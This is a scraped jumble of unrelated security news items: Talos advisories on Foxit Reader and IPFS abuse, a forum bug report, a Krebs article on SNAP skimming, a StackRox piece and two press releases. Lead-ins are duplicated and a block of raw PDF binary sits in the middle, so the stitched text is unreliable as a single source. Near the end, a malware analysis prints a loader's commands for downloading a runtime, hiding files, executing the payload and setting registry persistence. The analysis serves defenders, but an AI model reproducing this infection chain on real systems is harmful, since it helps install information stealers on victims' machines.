Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered several use-after-free vulnerabilities in Foxit Reader that could lead to arbitrary code execution.
The Foxit Reader is one of the most popular PDF document readers, which aims to have feature parity with Adobe’s Acrobat Reader. As

Thursday, November 10, 2022 15:11

_Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered several use-after-free vulnerabilities in Foxit Reader that could lead to arbitrary code execution.

The Foxit Reader is one of the most popular PDF document readers, which aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

Talos has identified four use-after-free vulnerabilities in Foxit Reader. The reader includes Javascript support to enable dynamic documents and multimedia content, which can be viewed interactively. A specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick a user into opening a malicious file to trigger these vulnerabilities.

TALOS-2022-1600 (CVE-2022-32774)

TALOS-2022-1601 (CVE-2022-38097)

TALOS-2022-1602 (CVE-2022-37332)

TALOS-2022-1614 (CVE-2022-40129)

Cisco Talos worked with Foxit to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Foxit Reader 12.0.1.12430. Talos tested and confirmed these versions of the reader could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60594-60595, 60604-60605, 60592-60593 and 60619-60620. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: Use-after-free vulnerabilities in Foxit Reader could lead to arbitrary code execution

xpdfreader 4.03 is vulnerable to Buffer Overflow.

minipython

**Posts:** 7

**Joined:** Tue Aug 17, 2021 3:35 am

**May be new stack-overflow bugs in pdftopng of xpdf4.03**

English is not my native language,please excuse typing errors.  
Here are some error messages in gdb.

Code: Select all

    Syntax Error (3302): Inline image dictionary key must be a name object
    Syntax Error (3302): Inline image dictionary key must be a name object
    Syntax Error (3302): Inline image dictionary key must be a name object
    Syntax Error (3302): Inline image dictionary key must be a name object

.

Code: Select all

    Syntax Error (2922): Illegal character <6e> in hex string
    Syntax Error (2923): Illegal character <25> in hex string
    Syntax Error (2924): Illegal character <50> in hex string
    Syntax Error (2927): Illegal character <2d> in hex string
    Syntax Error (2929): Illegal character <2e> in hex string
    Syntax Error (2938): Illegal character <6f> in hex string

In my attachements,i add a zip include gdb info,asan info and trigger crash files. 

Attachments

pdftopng\_information.zip

(11.09 KiB) Downloaded 223 times

CVE-2021-40226: May be new stack-overflow bugs in pdftopng of xpdf4.03

A nonprofit organization is suing the state of Massachusetts on behalf of thousands of low-income families who were collectively robbed of more than a $1 million in food assistance benefits by card skimming devices secretly installed at cash machines and grocery store checkout lanes across the state. Federal law bars states from replacing these benefits using federal funds, and a recent rash of skimming incidents nationwide has disproportionately affected those receiving food assistance via state-issued prepaid debit cards.

A nonprofit organization is suing the state of Massachusetts on behalf of thousands of low-income families who were collectively robbed of more than a $1 million in food assistance benefits by card skimming devices secretly installed at cash machines and grocery store checkout lanes across the state. Federal law bars states from replacing these benefits using federal funds, and a recent rash of skimming incidents nationwide has disproportionately affected those receiving food assistance via state-issued prepaid debit cards.

The Massachusetts SNAP benefits card looks more like a library card than a payment card.

On Nov. 4, **The Massachusetts Law Reform Institute** (MLRI) filed a class action lawsuit on behalf of low-income families whose Supplemental Nutrition and Assistance Program (SNAP) benefits were stolen from their accounts. The SNAP program serves over a million people in Massachusetts, and 41 million people nationally.

“Over the past few months, thieves have stolen over a million SNAP dollars from thousands of Massachusetts families – putting their nutrition and economic stability at risk,” the MLRI said in a statement on the lawsuit. “The criminals attach a skimming device on a POS (point of sale) terminal to capture the household’s account information and PIN. The criminals then use that information to make a fake card and steal the SNAP benefits.”

In announcing the lawsuit, the MRLI linked to a story KrebsOnSecurity published last month that examined how skimming thieves increasingly are targeting SNAP payment card holders nationwide. The story looked at how the vast majority of SNAP benefit cards issued by the states do not include the latest chip technology that makes it more difficult and expensive for thieves to clone them.

The story also highlighted how SNAP cardholders usually have little recourse to recover any stolen funds — even in unlikely cases where the victim has gathered mountains of proof to show state and federal officials that the fraudulent withdrawals were not theirs.

**Deborah Harris** is a staff attorney at the MLRI. Harris said the goal of the lawsuit is to force Massachusetts to reimburse SNAP skimming victims using state funds, and to convince **The U.S. Department of Agriculture** (USDA) — which funds the program that states draw from — to change its policies and allow states to replace stolen benefits with federal funds.

“Ultimately we think it’s the USDA that needs to step up and tell states they have a duty to restore the stolen benefits, and that USDA will cover the cost at least until there is better security in place, such as chip cards,” Harris told KrebsOnSecurity.

“The losses we’re talking about are relatively small in the scheme of total SNAP expenditures which are billions,” she said. “But if you are a family that can’t pay for food because you suddenly don’t have money in your account, it’s devastating for the family.”

The USDA has not said it will help states restore the stolen funds. But on Oct. 31, 2022, the agency released guidance (PDF) whose primary instructions were included in an appendix titled, Card Security Options Available to Households. Notably, the USDA did not mention the idea of shifting to chip-based SNAP benefits cards.

The recently issued USDA guidance.

“The guidance generally continues to make households responsible for preventing the theft of their benefits as well as for suffering the loss when benefits are stolen through no fault of the household,” Harris said. “Many of the recommendations are not practical for households who don’t have a smartphone to receive text messages and aren’t able to change their PIN after each transaction and keep track of the new PIN.”

Harris said three of the four recommendations are not currently available in Massachusetts, and they are very likely not currently available in other states. For example, she said, Massachusetts households do not have the option of freezing or locking their cards between transactions. Nor do they receive alerts about transactions. And they most certainly don’t have any way to block out-of-state transactions.

“Perhaps these are options that \[card\] processors and states could provide, but they are not available now as far as we know,” Harris said. “Most likely they would take time to implement.”

**The Center for Law and Social Policy** (CLASP) recently published Five Ways State Agencies Can Support EBT Users at Risk of Skimming. CLASP says while it is true states can’t use federal funds to replace benefits unless the loss was due to a “system error,” states could use their own funds.

“Doing so will ensure families don’t have to go without food, gas money, or their rent for the month,” CLASP wrote.

That would help address the symptoms of card skimming, but not a root cause. Hardly anyone is suggesting the obvious, which is to equip SNAP benefit cards with the same security technology afforded to practically everyone else participating in the U.S. banking system.

There are several reasons most state-issued SNAP benefit cards do not include chips. For starters, nobody says they have to. Also, it’s a fair bit more expensive to produce chip cards versus plain old magnetic stripe cards, and many state assistance programs are chronically under-funded. Finally, there is no vocal (or at least well-heeled) constituency advocating for change.

A copy of the class action complaint filed by the MLRI is available here.

Lawsuit Seeks Food Benefits Stolen By Skimmers

StackRox bridges network security and other gaps and makes applying and managing network isolation and access controls easier while extending Kubernetes' automation and scalability benefit.

To reap the full benefits of Kubernetes and microservices-based application architectures, organizations must transform how they implement security. This transformation often reveals gaps and silos across the development and operations teams and processes. Case in point: the gap between developers and the network security team.

Based on survey results from more than 300 DevOps, engineering, and security professionals, the "2022 State of Kubernetes Security Report" (PDF) shows that security is one the biggest concerns about container and Kubernetes adoption, with respondents noting that security issues have caused delays in deploying applications into production.

Almost all respondents to the survey, 93%, said they had experienced at least one security incident in their Kubernetes environment in the last 12 months, with 31% reporting a revenue or customer loss due to a security incident.

Most of these incidents come down to human error, with more than half (53%) of respondents saying they had detected a misconfiguration in Kubernetes in the last 12 months. There are many best practices for avoiding Kubernetes misconfigurations, but the reality is that Kubernetes is large and has a certain amount of complexity to it. Gaps among roles, responsibilities, and skill sets — common, especially for companies refactoring legacy applications — leave the door open to vulnerabilities.

For example, developers and the network security team may be working, if not at cross purposes, then in silos. Developers historically haven't been the ones to implement network security — they would just throw apps over the wall and rely on the security team to take care of network configuration.

In a Kubernetes world, however, the onus for security is on DevOps — or, at least, that's the perception. And, it makes sense that people would think like that: The whole notion of "shift left" is that security is addressed as early in the development cycle as possible.

Indeed, according to the survey, DevOps is the role most often cited as responsible for securing containers and Kubernetes: 15% of respondents consider developers as the primary owners of Kubernetes security, with only 18% identifying security teams as being most responsible.

But shifting left is not enough, especially when zero-day exploits are a relatively common occurrence. Only tight collaboration across development, IT operations, and network and other security teams can reasonably secure applications against attackers— especially those who are looking for points of entry from which they can move as far along the kill chain as possible.

Organizations likely understand all of this in theory, but in reality, there's a bit of a no-man's land when it comes to network security and Kubernetes: Who manages and understands and reviews network configuration within the cluster? Who is identifying and remediating misconfigurations ?

The gap between developers and the network security team can grow wider as companies move toward a zero trust model. With zero trust, of course, nothing is trusted. But businesses can't run that way. At some point, someone has to provide permissions to specific applications and services to communicate with each other.

**Kubernetes' NetSec Conundrum**

By default, Kubernetes deployments don't apply network policy to Kubernetes pods. Without network policies, any pod can talk to any other pod or network endpoint — the equivalent of a computer without a firewall. Someone must go in and define ingress and egress network policies that limit pod communication to defined assets.

In the past, developers indicated what communications paths needed to be made available, and network administrators made those paths available via traditional firewall configurations.

The problem is that network security engineers do not speak the Kubernetes language. In a Kube world, everything you do around network security needs to be written in YAML, a data serialization language, but network security engineers think in terms of IP addresses and IP tables. The NetSec team doesn't really understand the language that policies are written in, and the tools aren't familiar to them.

One tool that bridges network security and other gaps is StackRox, a cloud-native open source project that provides organizations with tools, training, and a community of shared experiences with building Kubernetes security implemented as security policies that can be used to monitor Kubernetes clusters and the workloads running on those clusters.

When it comes to network configuration, StackRox enables developers and security teams to visualize existing versus allowed network traffic. Using Kubernetes-native controls, NetSec teams can then more effectively enforce network policies and tighter segmentation. StackRox recently added a new feature to help developers define network policies prior to deploying their application to Kubernetes. This was developed in partnership with the developers of the np-guard project. StackRox roxctl now has the option to call np-guard to generate network policies by analyzing resource YAMLs.

With the StackRox project, organizations can address all significant security use cases across the entire application life cycle. Apropos of what I mentioned above, StackRox eases the process of applying and managing network isolation and access controls for applications. Other use cases include:

**Vulnerability management:** StackRox helps organizations protect against known vulnerabilities by identifying vulnerabilities in images and running containers.

**Security configuration management:** Organizations can leverage StackRox to ensure that Kubernetes is configured according to security best practices.

**Risk profiling:** StackRox provides the context needed to prioritize security issues throughout Kubernetes clusters by analyzing a variety of data about deployments.

**Compliance:** Organizations can leverage StackRox's compliance policies to meet contractual and regulatory requirements.

**Detection and response:** StackRox provides incident response capabilities, enabling organizations to address active threats in their environments.

In general, using Kubernetes-native controls such as StackRox — in other words, using the same infrastructure and its controls for application development and security — enables companies to go from shifting security left to shifting it to a 360-degree cycle, all while extending Kubernetes' automation and scalability benefits.

You can download StackRox from GitHub here. There you will also find related projects such as KubeLinter, a static analysis tool that enables developers to easily check Kubernetes YAML files, and Helm charts to identify misconfigurations and enforce security best practices.

How to Close Kubernetes' Network Security Gap

Cyberattackers like IPFS because it is resilient to content blocking and takedown efforts.

As has happened with other Web technologies designed for legitimate use, the InterPlanetary File System (IPFS) peer-to-peer network for storing and accessing content in a decentralized fashion has become a potent new weapon for cyberattacks.

Researchers from Cisco Talos this week reported observing multiple malicious campaigns leveraging the IPFS to host phishing kits and malware payloads. For many attackers, the IPFS has become the equivalent of a bulletproof hosting provider that is mostly impervious to takedown efforts, Talos said. Complicating matters for defenders is the fact that the IPFS is often used for legitimate purposes. So, differentiating between benign and malicious IPFS activity is another challenge, the security vendor said.

"Organizations should become familiar with these new technologies and how they are being leveraged by threat actors to defend against new techniques that use them," Talos said in a report summarizing the threat.

**Growing Threat**

This marks at least the second time in recent months that researchers have sounded the alarm on IPFS becoming a hotbed of cybercrime activity.

In July, Trustwave's SpiderLabs noted how its researchers had identified more than 3,000 emails with phishing URLs hosted in the IPFS in a three-month period. Phishing pages that it observed on the IPFS included those that spoofed Microsoft Outlook login pages, Google domains and cloud storage services such as Filebase.io and nftstorage.link. "Phishing techniques have taken a leap by utilizing the concept of decentralized cloud services using IPFS," Trustwave said. The growing use of IPFS by many file storage, Web hosting, and cloud service companies means that attackers have a lot more flexibility in creating new phishing URLs that cannot be easily blocked, the security vendor said.

IPFS is a peer-to-peer file sharing system that Protocol Labs launched in 2015. The network is designed to allow decentralized storage of content. Content stored in the IPFS is mirrored across multiple nodes, or systems that participate in the network. Individuals and others can use IPFS to store different types of data including webpages, files, NFTs, and documents.

Resources stored on the IPFS are assigned unique identifiers. Users can employ the identifier to access the content via IPFS clients or gateways, which are like gateways for accessing content on the Tor network. Because content is mirrored on IPFS, it is always available even if one node goes down.

This has made the IPFS an attractive option for hosting phishing kits and malware for cybercriminals. Because content on the IPFS does not have a static IP address, it cannot be blocked using standard IP blocking and blacklisting mechanisms. Similarly, taking down a node containing phishing pages and malware does little to neutralize a threat because the content is mirrored across multiple nodes. There is also no central authority on the IPFS that law enforcement or security vendors can contact to take down a phishing or malware distributing site.

In an example of how attackers are abusing IPFS, Talos pointed to a phishing campaign in which victims receive an email with an attached PDF that purports to be associated with the DocuSign document signing service. When a user clicks on the "Review Document" link, they are directed to a webpage that appears to be a legitimate Microsoft authentication page but is really a credential-harvesting page hosted on the IPFS network.

In situations where an IPFS gateway might recognize the resource being requested as malicious and block access, attacker simply change the IPFS gateway that is used to retrieve the content, Talos said.

**Phishing Not the Only Threat**

Phishing pages are not the only threat. A growing number of attackers are also leveraging the peer-to-peer network to distribute malicious payloads.

In one campaign that Talos researchers observed, the attacker sent victims a phishing email with a ZIP attachment containing a malware dropper in the form of a PE32 executable. When run, the downloader would reach out to an IPFS gateway and retrieve a second-stage malware payload hosted on the peer-to-peer network. The attack chain ended with the Agent Tesla remote-access Trojan getting dropped on the victim's system.

Talos researchers also found a destructive, disk-wiping malware tool and a full-featured information-stealer called Hannabi Grabber hosted in IPFS nodes.

"Many new Web3 technologies have emerged recently, attempting to provide valuable functionality to users," Talos said in the report. "As these technologies have continued to see increased adoption for legitimate purposes, they have begun to be leveraged by adversaries as well."

The researchers expect the trend to gain momentum as more threat actors realize the IPFS is resilient to content moderation and takedown efforts.

"Organizations should be aware of how these newly emerging technologies are being actively used across the threat landscape and evaluate how to best implement security controls to prevent or detect successful attacks in their environments," the vendor said.

InterPlanetary File System Increasingly Weaponized for Phishing, Malware Delivery

An out-of-bounds write vulnerability exists in the PICT parsing pctwread_14841 functionality of Accusoft ImageGear 20.0. A specially-crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-32588: TALOS-2022-1544 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the console infct functionality of InHand Networks InRouter302 V3.5.45. A specially-crafted series of network requests can lead to execution of privileged operations. An attacker can send a sequence of requests to trigger this vulnerability.

%PDF-1.3 %��������� 3 0 obj << /Filter /FlateDecode /Length 2902 >> stream x�\[\]s۸}ׯ@�䙈@$��u;��t6ٵ&ݙN����á${����\\�4)�)X�$6i�����ރs���W�������3�����k�FH�s�Xɖ��9��s��|�T��H͙��d�a��s���������I6����l�p��wn������\]���\]T߮&�M�W���O���G��ݭ����ݸ���W��\*Oxd2e?�'��}p�U����������s��\`t��7V��������� ���Τ��Op�� ���Md7�ԊDJ)X��I7��وa�C#MOCCq�d���4B��n0/�z���V�Nd�� �����XV�ќ�<.��1#<�� ��aq�#Db�4�cL4�F$g:�5hcx���̏Yͼ#��\_|���

CVE-2022-30543

Teleport releases its second annual State of Infrastructure Access and Security report.

**OAKLAND, Calif., Nov. 9, 2022 /PRNewswire/** — Teleport, the leader in identity-native infrastructure access, today revealed its second annual State of Infrastructure Access and Security Report (PDF). The research seeks to uncover the specific challenges facing DevOps, security engineering and other security professionals. The survey found access built on secrets continues to represent the status quo, as 80% of respondents are still using passwords as a top security method. Concerningly, less than a quarter (24%) of respondents are fully confident that ex-employees no longer have access to company infrastructure.

The report offers a representative sample of the common beliefs and observations shared by industry professionals, as well as the actions they take to keep their organizations safe. Key findings include:

*   **Infrastructure is becoming more complex — with no signs of slowing down:** Organizations use on average 5.7 different tools to manage access policy, making it complicated and time-consuming to completely shut off access.
*   **Even the best-laid plans fall victim to complexity or apathy:** More than half (57%) of respondents said their organization has implemented new security methods that failed to be adopted by employees.
*   **Security spending is on the rise:** Even amid the ongoing inflation crisis, 85% of respondents say their security spending increased within the last 12 months.

"The 2022 Infrastructure Access and Security Report definitively shows that DevOps, security engineering and other security professionals understand the challenges they face, as well as the most effective tools for securing their infrastructure," said Ev Kontsevoy, CEO of Teleport. "But while the vision is clear, execution continues to lag behind."

**Infrastructure is only becoming more complex**

One year ago, the 2021 State of Infrastructure Access and Security Report highlighted the incredible complexity of technology architectures. While 77% of respondents said that moving to passwordless access was Important or Very Important, this year's survey reveals that number of respondents using passwords to grant access to infrastructure increased by 10% year over year, from 70% in 2021 to 80% in 2022.

**Crises of confidence and clarity**

When asked how confident they were that employees who leave the company can no longer use secrets to access company infrastructure, less than a quarter of respondents reported being 100% confident that the access had been revoked. Strikingly, nearly half of organizations are less than 50% confident that former employees no longer have access to infrastructure. This lack of confidence is trending in the wrong direction: the share of respondents with less than 50% confidence increased by 55% year over year.

The report found that respondents recognize the need to move toward passwordless access, and the share of those who view this shift as important increased over the last 12 months. Compared with 77% in 2021, 87% of respondents to this year's survey said moving towards a passwordless infrastructure is important or very important. This priority is reflected in company initiatives: 77% of respondents have an active initiative to move towards passwordless access; and 78% of respondents have an active initiative to move to biometric authentication, the most effective tool for establishing human identity for secure access.

While adoption of biometric authentication is promising — more than half (55%) of respondents already use biometrics in their systems — there are still significant barriers to widespread adoption. Notably, 62% of respondents cited privacy concerns as a leading challenge when replacing passwords with biometric authentication, while 55% pointed to a lack of devices capable of biometric authentication.

"With architectures growing in complexity, coupled with the rising number of threats and bad actors, DevOps and security engineering leaders cannot afford to delay any longer in turning their plans into actions," said Kontsevoy. "Secretless, identity-based infrastructure access is the only way forward."

**Methodology**

The 2022 Infrastructure Access and Security Report survey was based on a representative sample of DevOps, Security Engineering, and other security professionals with knowledge about how their company manages access to infrastructure. A total of 500 respondents completed the survey, which was conducted by Schlesinger Group, an independent research company.

The Teleport Infrastructure Access and Security report is available today and can be found here (PDF).  

**About Teleport**

Teleport is the first identity-native infrastructure access platform for engineers and machines. By replacing insecure secrets with true identity, Teleport delivers phishing-proof zero trust for every engineer and service connected to your global infrastructure. The open source Teleport Access Platform provides a frictionless developer experience and a single source of truth for infrastructure access. Teleport is used by leading companies including Elastic, Samsung, NASDAQ, and IBM. The company is backed by Bessemer Venture Partners, Insight Partners and Kleiner Perkins. Headquartered in Oakland, California, the company embraces a remote-first work culture. For more information, please visit goteleport.com.

**SOURCE:** Teleport

Research Finds Less Than a Quarter of Organizations Fully Confident Ex-Employees No Longer Have Access to Company Infrastructure

The market growth is driven by the convergence of IT and OT systems. By region, North America is estimated to account for the largest market size during the forecast period.

**CHICAGO, Nov. 9, 2022 /PRNewswire/** \-- The Global Industrial Control Systems (ICS) Security Market is projected to grow from USD 16.7 billion in 2022 to USD 23.7 billion by 2027, at a Compound Annual Growth Rate (CAGR) of 7.2% from 2022 to 2027, according to a new report by MarketsandMarkets™**.** The market growth is driven by the convergence of IT and OT systems.

**Download PDF Brochure:** https://www.marketsandmarkets.com/pdfdownloadNew.asp?id=1273

**By security type, network security to grow at the highest CAGR during the forecast period**

Network security is the technique of securing networks from advanced threats. Network security comprises ICS security services that provide security to various networking assets and resources used for managing critical infrastructure. It consists of multiple components, such as security software and appliances, which work together to provide network security. Sophisticated threats, such as sophisticated malware and other attacks, such as Advanced Persistent Threats (APTs), negatively impact the ICS ecosystem by evading network defenses and targeting vulnerabilities in the computing system. Organizations adopt ICS security services to prevent unauthorized access and the misuse of networking resources.

**Speak To Our Analyst:** https://www.marketsandmarkets.com/speaktoanalystNew.asp?id=1273

**By Region, North America is estimated to account for the largest market size during the forecast period**

North America has been at the forefront of the adoption of ICS security solutions in lieu of the rising number of cyberattacks on critical infrastructure. ICS security solutions are being widely used in a variety of industries, particularly manufacturing, chemicals, energy, and utilities. This region has also been extremely responsive toward the latest technological advancements, such as the integration of cloud and IoT with ICS security solutions, to establish a holistic secure access mechanism and enforce a security governance framework. With the growing awareness of ICS security among small and medium-sized businesses and the widespread use of data-driven methods in manufacturing operations, the adoption of emerging technologies opens the door to the substantial market share held by the North American region. Public-Private Partnerships (PPP) and international collaborations have led to effective ICS security and resilience in the region.

**Key Players:**

Major vendors in the global **Industrial Control Systems (ICS) Security Market** include Cisco (US), ABB (Switzerland), Lockheed Martin (US), Fortinet (US), Honeywell (US), Palo Alto Networks (US), BAE Systems (UK), Raytheon (US), Trellix (US), Darktrace (UK), Check Point (US and Israel), Kaspersky Labs (Russia), Airbus (France), Belden (US), Sophos (US), CyberArk (US), Claroty (US), Dragos (US), Nozomi Network (US), Cyberbit (Israel), Forescout (US), Radiflow (Israel), Verve Industrial Protection (US), Applied Security (Netherland), and Positive Technology (Russia).

**Browse Adjacent Markets:**

**Information Security Market Research Reports & Consulting**

**Digital Signature Market** - Global Forecast to 2027

**Cyber Security Market** - Global Forecast to 2027

**Anti-Money Laundering Solution Market** - Global Forecast to 2027

**Multi-Factor Authentication Market** - Global Forecast to 2027

**Zero-Trust Security Market** - Global Forecast to 2027

**About MarketsandMarkets™**

MarketsandMarkets™ provides quantified B2B research on 30,000 high -growth niche opportunities/threats which will impact 70% to 80% of worldwide companies' revenues. Currently servicing 7,500 customers worldwide, including 80% of global Fortune 1000 companies as clients. Almost 75,000 top officers across eight industries worldwide approach MarketsandMarkets™ for their painpoints around revenues decisions.

Our 850 full-time analysts and SMEs at MarketsandMarkets™ are tracking global high-growth markets following the "Growth Engagement Model – GEM". The GEM aims at proactive collaboration with the clients to identify new opportunities, identify most important customers, write "Attack, avoid and defend" strategies, identify sources of incremental revenues for both the company and its competitors. MarketsandMarkets™ now coming up with 1,500 MicroQuadrants (Positioning top players across leaders, emerging companies, innovators, strategic players) annually in high growth emerging segments. MarketsandMarkets™ is determined to benefit more than 10,000 companies this year for their revenue planning and help them take their innovations/disruptions early to the market by providing them research ahead of the curve.

MarketsandMarkets's flagship competitive intelligence and market research platform, "Knowledge Store" connects over 200,000 markets and entire value chains for deeper understanding of the unmet insights along with market sizing and forecasts of niche markets.

Research Insight: https://www.marketsandmarkets.com/ResearchInsight/industrial-control-systems-security-ics-market.asp

**SOURCE:** MarketsandMarkets

Industrial Control Systems (ICS) Security Market Worth $23.7B by 2027, Report Says

The InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread abuse by threat actors.
Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
IPFS is often used for legitimate

*   The InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread abuse by threat actors.
*   Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
*   IPFS is often used for legitimate purposes, which makes it more difficult for security teams to differentiate between benign and malicious IPFS activity in their networks.
*   Multiple malware families are currently being hosted within IPFS and retrieved during the initial stages of malware attacks.
*   Organizations should become familiar with these new technologies and how they are being leveraged by threat actors to defend against new techniques that use them.

The emergence of new Web3 technologies in recent years has resulted in drastic changes to the way content is hosted and accessed on the internet. Many of these technologies are focused on circumventing censorship and decentralizing control of large portions of the content and infrastructure people use and access on a regular basis. While these technologies have legitimate uses in a variety of practical applications, they also create opportunities for adversaries to take advantage of them within their phishing and malware distribution campaigns. Over the past few years, Talos has observed an increase in the number of cybercriminals taking advantage of technologies like the InterPlanetary File System (IPFS) to facilitate the hosting of malicious content as they provide the equivalent of “bulletproof hosting” and are extremely resilient to attempts to moderate the content stored there.

**What is the InterPlanetary File System (IPFS)?**

The InterPlanetary File System (IPFS) is a Web3 technology designed to enable decentralized storage of resources on the internet. When content is stored on the IPFS network, it is mirrored across many systems that participate in the network, so that when one of these systems is unavailable, other systems can service requests for this content.

IPFS stores different types of data, such as the images associated with NFTs, resources used to render web pages, or files that can be accessed by internet users. IPFS was designed to be resilient against content censorship, meaning that it is not possible to effectively remove content from within the IPFS network once it’s stored there.

**IPFS gateways**

Users that wish to access content stored within IPFS can do so either using an IPFS client, such as the one provided here, or they can make use of “IPFS Gateways” which effectively sit between the internet and the IPFS network to allow clients to access content hosted on the network. This functionality is similar to what Tor2web gateways provide to access contents within the Tor network without requiring a client installation.

Anyone can set up an IPFS gateway using a range of publicly available tools. This screenshot shows several of the public IPFS gateways accessible across the internet.

It is simple to store new content within IPFS and once there, the content is resilient against takedowns, making it increasingly attractive to a variety of attackers for hosting phishing pages, malware payloads and other malicious content.

When systems use IPFS gateways to access contents stored on the IPFS network, they typically rely on the same HTTP/HTTPS-based communications used to access other websites on the internet. IPFS gateways can be configured to handle incoming requests in a few different ways. In some implementations, the subdomain specified in the HTTP request is often used to locate the requested resource on the IPFS network as shown in the following example, which is a mirrored copy of Wikipedia hosted on the IPFS network. The IPFS identifier, or CID, for the resource is highlighted below.

hxxps\[:\]//**bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze\[**.\]ipfs\[.\]infura-ipfs\[.\]io

In other implementations, the IPFS resource location is appended to the end of the URL being requested, as shown in the following example:

hxxps\[:\]//ipfs\[.\]io/ipfs/**bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze**

There are other methods for handling requests using DNS entries, as well. The specific implementation varies across IPFS gateways. Browsers have even begun implementing native support for the IPFS network, removing the need to use IPFS gateways in some cases.

**IPFS use in phishing campaigns**

IPFS is currently being leveraged to host phishing kits, which are the websites that phishing campaigns typically use to collect and harvest credentials from unsuspecting victims. In one example, the victim received a PDF that purports to be associated with the DocuSign document-signing service. A screenshot of one such PDF is shown below.

When the victim clicks on the “Review Document” link, they are redirected to a page made to appear as if it is a Microsoft authentication page. However, the page is actually being hosted on the IPFS network.

The user is prompted to enter an email address and password. This information is then transmitted to the attacker via an HTTP POST request to an attacker-controlled web server where it can be collected and processed for use in further attacks.

We’ve observed several similar examples in phishing campaigns over the past year, as adversaries recognize the content moderation challenges associated with hosting their phishing kits on the IPFS network. In this case, the PDF hyperlink was pointing to an IPFS gateway that moderated the content to protect potential victims and displayed the following message to victims attempting to navigate to it.

However, the content is still present within the IPFS network and simply changing the IPFS gateway being used to retrieve the content confirms this is the case.

**IPFS use in malware campaigns**

There are a variety of threat actors currently leveraging technologies like IPFS in their malware distribution campaigns. It provides low-cost storage for malicious payloads while offering resilience against content moderation, effectively acting as “bulletproof hosting” for adversaries. Likewise, the use of common IPFS gateways for accessing the malicious contents hosted within the IPFS network makes it more difficult for organizations to block access when compared to the use of malicious domains for content retrieval. We have observed various samples in the wild that are currently leveraging IPFS.

Throughout 2022, we’ve observed the volume of samples in the wild continuing to increase as this becomes a more popular hosting method for adversaries. Below is a graphic showing the increase in the number of unique samples relying on IPFS that have been uploaded to public sample repositories.

**Agent Tesla malspam campaign**

We’ve observed ongoing malspam campaigns leveraging IPFS throughout the infection process to eventually retrieve a malware payload. In one example, the email sent to victims purports to be from a Turkish financial institution and claims to be associated with SWIFT payments, a commonly used system for international monetary transactions.

The email contains a ZIP attachment that holds a PE32 executable. The executable, written in .NET, functions as a downloader for the next stage of the infection chain. When executed, the downloader reaches out to an IPFS gateway to retrieve a blob of data that has been hosted within the IPFS network as shown below.

This data contains an obfuscated PE32 executable that functions as the next-stage malware payload. The downloader takes the data from the IPFS gateway and stores each byte in an array. It then uses a key value stored in the executable to convert the byte array into the next-stage PE32.

This is then reflectively loaded and executed, launching the next stage of the infection process, which in this case is a remote access trojan (RAT) called Agent Tesla.

In another example, we observed a variety of malware payloads being uploaded to public sample repositories over a period of several months. We identified three distinct clusters of malware that were likely being created by the same threat actor. Code-level issues suggest that many of the samples were currently undergoing active development while being uploaded, possibly to test detection capabilities.

In all three clusters, the initial payload functioned as a loader and operated similarly, however, the final payload hosted on the IPFS network was different in each cluster. The final payloads we observed included a Python-based information stealer, reverse shell payloads that were likely generated using msfvenom, and a batch file designed to destroy victim systems.

**Initial loader**

The loader used in all of these cases functioned similarly, sometimes hosted on the Discord content delivery network (CDN), a practice that has become increasingly common with malware distributors as previously described here. The file names used indicate that they may have been spread under the guise of cheats and cracks for video games such as “Minecraft.” In most cases, the loader was not packed, but we did observe samples packed using UPX.

When executed, the loader first creates a directory structure within %APPDATA% using the following command:

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft && mkdir Network

The malware then attempts to retrieve Python 3.10 from the legitimate software provider using the cURL command.

This is notable, as the choice to directly leverage cURL may significantly reduce the number of potential victims, as it was not added to Windows as a native command line utility until Windows 11. The command line syntax used to initiate the download is shown below.

C:\Windows\system32\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip

Once the ZIP archive has been retrieved, it is then unzipped into the directory that was previously created using the PowerShell “Expand-Archive” cmdlet.

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\Microsoft\Network

The malware then attempts to retrieve the final payload in the infection chain, storing it within the Network directory using the filename “Packages.txt.” An example of the loader retrieving Hannabi Grabber, an information stealer written in Python is shown below.

The loader then uses the attrib.exe utility to set the System and Hidden flags on the previously created directory as well as the Python ZIP archive and final payload that was retrieved.

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network\Packages.txt

Finally, the loader invokes the newly downloaded Python executable and passes the final payload as a command line argument, executing the next stage of the infection process.

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && python.exe Packages.txt

In some cases, the malware was also observed achieving persistence via adding entries into the Windows registry at the following locations:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon  
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

